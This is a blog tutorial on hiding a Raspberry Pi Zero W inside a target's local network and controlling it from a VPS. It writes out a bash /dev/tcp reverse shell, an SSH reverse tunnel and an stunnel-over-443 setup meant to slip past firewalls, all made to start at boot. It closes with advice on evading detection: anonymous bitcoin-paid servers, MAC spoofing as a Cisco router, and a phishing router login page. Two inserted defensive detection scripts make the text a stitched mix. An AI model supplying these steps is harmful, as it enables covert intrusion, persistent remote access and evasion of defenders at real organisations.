December 21, 2018
Infiltration in local network on site with Raspberry Pi W zero (creating tunnel)
In this post I will describe how you can infiltrate a local network by using a hardware implant such as a Raspberry Pi. This is very useful if you want to perform an attack on site, e.g. at a company, shopping center, hospital, school, etc. The goal is to install a small device such as a Raspberry Pi which allows us to connect to the local network and perform the attack from there.
You can use different models such as the Raspberry Pi 2, 3 or W zero. The Raspberry Pi 3 can connect to the network over wifi or over the RJ45 port, while the Raspberry Pi W zero connects only over wifi. But the Raspberry Pi W zero is a lot smaller, cheaper (only $10) and consumes less power. Lower power consumption is also an advantage if during the attack you do not have a power socket and need to run it from a battery: it will last longer.
For the purpose of this post I will use the Raspberry Pi W zero.
In the following text I will show you how to prepare the Raspberry Pi W zero for the attack and how to tunnel all traffic from the Pi to a VPS server. After that we will be able to connect to the VPS server over SSH and control the Pi from there.
I will show you three different ways to perform the tunneling: over plain TCP, over SSH, and over an SSH/SSL tunnel. Plain TCP is technically the easiest, while SSH and SSH/SSL are a little bit harder. But do not be afraid, it is not rocket science.
2. Preparing the Raspberry Pi W zero
2.1. Burning Kali Linux on the SD card
If you already have Kali Linux installed on your Pi you can skip this paragraph.
I downloaded the Kali Linux image by Re4son from the following link, but you can also download it from the official site:
Then I used Win32DiskImager to write the .img file to the SD card. It creates two partitions on the SD card. Be aware that one of the partitions is formatted as EXT4, so you cannot see or read it on a Windows machine.
2.2. Set up wifi to connect to the network at boot
Now we will set up the wifi so that each time we boot the Raspberry Pi W zero it automatically connects to the wifi network. Note that you will need the wifi credentials. You can also connect it over an ethernet connector, but in this case you additionally need a micro USB ethernet adapter, while the Raspberry Pi 3 already has one built in.
For this setup you will need to plug the SD card into any Linux machine.
Browse to the file /etc/network/interfaces and add the following lines:
# The address mode was cut off on the page; 'manual' plus a wpa-roam line
# pointing at the wpa_supplicant.conf edited below is the standard Debian
# layout that goes together with the 'iface default inet dhcp' line.
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
Next, in the file /etc/wpa_supplicant/wpa_supplicant.conf add:
2.3. Allow SSH server to start at boot
To automatically start the SSH server on the Raspberry Pi, add the following line to /etc/rc.local:
sudo /etc/init.d/ssh start
That's it. As soon as we turn on the Raspberry Pi W zero it will boot and start the SSH server. Because we also set up the wifi connection at boot, we can connect to the Raspberry Pi over SSH with the following command and the default password toor:
ssh root@<Raspberry Pi IP>
To find the Raspberry Pi W zero's address we can perform a simple scan of the local network. Do not forget to change the default password after the first boot.
3. Preparing the VPS server
For the purpose of this post I created a VPS server (Ubuntu) on DigitalOcean (digitalocean.com). During the setup I added my SSH public key, so I can connect to the server from my Linux machine over SSH. That's it.
4. Approach 1 – create tunnel with TCP protocol
This is the easiest way to create a tunnel between the Raspberry Pi W zero and the VPS server, and consequently to control the Pi through the server. We need only a one-line command on each side, the Raspberry Pi W zero and the VPS server:
On Raspberry Pi W zero: bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1
On VPS server: nc -vv -l -p 5555
Of course, during the on-site attack we do not have a monitor and keyboard hooked up to our Raspberry Pi W zero, so we need to make sure that this command runs as soon as we power the Raspberry Pi W zero on. For this reason we will create a service which does the heavy lifting for us.
4.1. Set up service on Raspberry Pi
First, we will create a bash file (I named it service.sh) and save it in the folder /etc/systemd/system:
#!/bin/bash
# The interpreter line is needed because >& and /dev/tcp are bash features,
# not available under /bin/sh.
bash -i >& /dev/tcp/<VPS server IP>/5555 0>&1
Then we will create a service file (I named it system.service) and save it in the same folder /etc/systemd/system:
script with systemd
Then set permissions for both newly created files:
Start the service:
And last, enable the service to start at each boot:
Now reboot the Raspberry Pi W zero and try to connect to it from the VPS server with the following command:
nc -vv -l -p 5555
That's the whole "magic". Now you can control a Raspberry Pi W zero connected to any network (provided, of course, that you have the wifi password and physical access to the victim network). And any time we lose the connection for whatever reason, the Raspberry Pi will connect back to the VPS server.
I would use this approach when I know that the target site has no system admin and does not put much effort into security. You need to know that this TCP traffic is not encrypted, so it can easily be captured and detected.
So in the following text I will show you a slightly more secure approach using the SSH protocol. Once a connection between the Raspberry Pi W zero and the VPS server is established, the data transmitted between them is encrypted.
5. Approach 2 – create tunnel with SSH protocol
For this purpose we need to set up key-based authentication, which will let the Raspberry Pi W zero open an SSH connection to the VPS server. On the Raspberry Pi W zero we will use ssh-keygen, which creates a public and a private key:
ssh-keygen -f ~/.ssh/vps -t rsa -N ''
Copy the public key (with the -f argument above it is written to ~/.ssh/vps.pub; ~/.ssh/vps is the private key and stays on the Pi) and paste its content into authorized_keys in the /root/.ssh directory on the VPS server, then restart the ssh service:
Now just try to connect from the Raspberry Pi W zero to the VPS server over SSH with the following command, to see if the key works:
ssh -i ~/.ssh/vps root@<VPS server IP>
If you successfully connected to the VPS server, everything works fine. You can disconnect with the command exit.
Now that SSH is set up correctly, we can tunnel the connection from the Raspberry Pi to the VPS server by running the following command:
On Raspberry Pi W zero: ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <server IP>
And again, as in the previous approach, we need to start that command on the Raspberry Pi W zero at boot. For this we can use the same method as in approach 1 and create a service (paragraph 4.1.). After you have done that, reboot the Raspberry Pi W zero and run ssh root@localhost -p 5555 on the VPS server. You should get a shell which lets you command the Raspberry Pi remotely.
Now that we have gone through two different tunneling approaches (TCP and SSH), I will briefly explain why I included the next approach (SSH/SSL) in this post.
Let's imagine that we are attacking some big company which also has an IT department with system admins and some sort of IDS, IPS and firewall doing deep packet inspection, regular scanning, etc. Such company networks usually block port 22. And if you run SSH over e.g. port 443, their systems would identify it and drop the traffic. This is the reason I chose stunnel: I can wrap the SSH connection so that it looks like SSL traffic. We will establish an SSL tunnel over port 443, so it looks like normal SSL traffic and consequently the firewall will permit it. Enough of my briefing words, let's do it.
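The author notes that the plain TCP version is easy to capture, and relies on TLS on 443 to blend in. The following added example (not part of the original post) shows the defender's side: the reconnecting tunnel leaves a pattern in connection metadata, long sessions from one internal host to one external endpoint that resume within seconds of dropping, and that pattern is visible whether the payload is a raw shell, SSH or stunnel-wrapped TLS. The log format, addresses and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall/NetFlow export, not real traffic:
# "<start ISO-8601> <internal src> <external dst:port> <duration seconds>"
SAMPLE_LOG = """\
2018-12-21T08:00:00 10.0.5.44 203.0.113.10:443 3590
2018-12-21T09:00:02 10.0.5.44 203.0.113.10:443 3600
2018-12-21T10:00:05 10.0.5.44 203.0.113.10:443 3598
2018-12-21T11:00:04 10.0.5.44 203.0.113.10:443 3600
2018-12-21T08:00:10 10.0.5.21 198.51.100.7:443 12
2018-12-21T08:03:00 10.0.5.21 198.51.100.7:443 9
2018-12-21T12:00:00 10.0.5.21 203.0.113.99:443 240
"""


def parse_log(text):
    """Yield (start, src, dst, duration) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        start, src, dst, dur = parts
        yield datetime.fromisoformat(start), src, dst, int(dur)


def find_persistent_callbacks(text, min_sessions=3, min_duration=600, max_gap=60):
    """Return {(src, dst): session_count} for pairs that behave like a
    reconnecting reverse tunnel: at least min_sessions long-lived sessions
    to one external endpoint, each starting within max_gap seconds of the
    previous one ending (the systemd Restart= / autossh re-dial pattern).
    Only metadata is used, so TLS wrapping the payload does not matter."""
    by_pair = defaultdict(list)
    for start, src, dst, dur in parse_log(text):
        by_pair[(src, dst)].append((start, dur))
    hits = {}
    for pair, sessions in by_pair.items():
        chain = sorted(s for s in sessions if s[1] >= min_duration)
        if len(chain) < min_sessions:
            continue
        # Gap between one session's end and the next session's start.
        gaps = [(nxt - (cur + timedelta(seconds=dur))).total_seconds()
                for (cur, dur), (nxt, _) in zip(chain, chain[1:])]
        if all(g <= max_gap for g in gaps):
            hits[pair] = len(chain)
    return hits


if __name__ == "__main__":
    for (src, dst), n in find_persistent_callbacks(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {n} back-to-back long sessions, check this host")
```

In the sample, 10.0.5.44 is flagged for four consecutive hour-long sessions to one endpoint with gaps of 12, 3 and 1 seconds, while the short browsing sessions from 10.0.5.21 are not.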
6. Approach 3 – create tunnel with SSH/SSL
First of all we need to generate a private and public key on the Raspberry Pi W zero and put the public key on the VPS server, as we did in the previous approach (SSH). I will not write it down again, to avoid duplicating text and work.
Next we need to install some prerequisites.
Set up the Raspberry Pi W zero
apt-get install stunnel4
apt-get install autossh
After that, we need to create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:
; client mode: without it stunnel would act as a TLS server on the Pi
client = yes
accept = 443
; the destination was cut off on the page; it is the VPS server's
; stunnel listener, whose accept = 443 is configured below
connect = <VPS server IP>:443
We need to ensure that the tunnel starts automatically. Add the following to the /etc/default/stunnel4 file:
Then we need to make the Raspberry Pi W zero establish the SSH tunnel automatically when the network interface comes up, by creating the file /etc/network/if-up.d/autossh with the following content:
After that, on the VPS server, we need to create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:
pid = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem
accept = 443
connect = 127.0.0.1:22
We need to ensure that the tunnel starts automatically and listens on port 443. Add the following to the /etc/default/stunnel4 file:
Finally, reboot the VPS server.
That's it. To get control over the Raspberry Pi W zero, run the following on the VPS server:
ssh -p 5555 root@localhost
To sum up, I explained three different ways to control the Raspberry Pi W zero remotely over the VPS server, and consequently from anywhere in the world. My recommendation is to stick to the last, SSH/SSL, approach in every case.
I hope that you will use this only for educational purposes and not for illegal shit. But anyway, I will give you some additional tips on how to avoid detection. Remember that this will not protect you 100%, there is always a way to track you down. OK, if you really want to hide your traces you should never buy a VPS server with your real ID and pay for it with a credit card. There are plenty of VPS providers that accept bitcoin. Next, never connect to the VPS server from home. Go to a public place and connect from there. For the connection to the VPS use a freshly installed virtual machine and delete it after making some noise. Make sure no public camera catches you, leave your phone at home and pray to god that they will not catch you :).
OK, I will also add some additional tips for serious penetration testers. If we try to attack some big, serious company by infiltrating a Raspberry Pi into their network, it is just a question of time before the gadget gets noticed. Why? Every serious system admin performs regular scanning/mapping of the network, and as soon as they run e.g. nmap they will notice the new hardware with the name Raspberry Pi. And the game is over. So I strongly recommend that you spoof the MAC address. Check common vendors' MAC addresses and use one of them. For example, I would give my Raspberry Pi a Cisco router MAC address. I would also host a web page on my Raspberry Pi that looks like the default router login page and set it up as a phishing page, so in the end it looks like a real, legitimate router. And if you are lucky, some "noob" admin will try to log in to it. That would be a pure win for the penetration tester.
It may also be a smart move to bring two Raspberry Pis to the audit: one spoofed as a router and one as e.g. a printer, just in case they detect you and shut down one of your gadgets.
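The author's point that a scan reveals a host named raspberrypi, and that a spoofed vendor MAC hides it, also tells the defender what a sound check looks like: vendor lookups are not trustworthy, so every lease or ARP entry should be compared against an asset inventory, with default implant hostnames and uninventoried "infrastructure" flagged for a look. The following is an added example, not from the original post; the lease lines, MACs (locally administered 02: prefixes, not real vendor assignments), inventory and vendor table are all constructed.

```python
# Constructed dnsmasq-style lease file:
# "<expiry epoch> <mac> <ip> <hostname> <client-id>"
SAMPLE_LEASES = """\
1545382800 02:11:22:00:00:01 10.0.5.10 fileserver01 *
1545382800 02:11:22:00:00:02 10.0.5.11 printer-2f *
1545382800 02:55:66:00:00:07 10.0.5.44 raspberrypi *
1545382800 02:33:44:00:00:09 10.0.5.45 core-rtr-2 *
1545382800 02:11:22:00:00:03 10.0.5.12 laptop-jdoe *
"""

# Constructed asset inventory: MAC -> hostname we expect behind it.
INVENTORY = {
    "02:11:22:00:00:01": "fileserver01",
    "02:11:22:00:00:02": "printer-2f",
}

# Constructed stand-in for an OUI lookup. A spoofed MAC passes this check,
# which is why the inventory, not the vendor, is treated as authoritative.
OUI_VENDOR = {"02:11:22": "ExampleCorp workstations", "02:33:44": "ExampleNet routers"}

DEFAULT_IMPLANT_NAMES = ("raspberrypi", "kali")
INFRA_HINTS = ("rtr", "router", "switch", "printer")


def audit_leases(text, inventory=INVENTORY, oui=OUI_VENDOR):
    """Return [(ip, mac, reason)] for every lease a defender should look at."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _, mac, ip, host = parts[:4]
        mac, name = mac.lower(), host.lower()
        vendor = oui.get(mac[:8], "unknown vendor")
        if mac in inventory:
            if inventory[mac] != host:
                findings.append((ip, mac, f"hostname changed from {inventory[mac]} to {host}"))
            continue
        if name.startswith(DEFAULT_IMPLANT_NAMES):
            findings.append((ip, mac, f"uninventoried device with default implant hostname {host}"))
        elif any(h in name for h in INFRA_HINTS):
            findings.append((ip, mac, f"uninventoried {host} claims infrastructure role ({vendor})"))
        else:
            findings.append((ip, mac, f"uninventoried device {host} ({vendor})"))
    return findings


if __name__ == "__main__":
    for ip, mac, reason in audit_leases(SAMPLE_LEASES):
        print(f"{ip} {mac}: {reason}")
```

Note that core-rtr-2 is flagged even though its MAC resolves to a router vendor: a plausible vendor prefix earns no trust when the device is not in the inventory.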
I also recommend that you do not run the VPS server as root. If your Raspberry Pi is detected, they can copy the private key from the SD card and use it to pwn your VPS very easily.
There are many other useful tips, but I will leave them for another opportunity. The conclusion is already too long anyway :).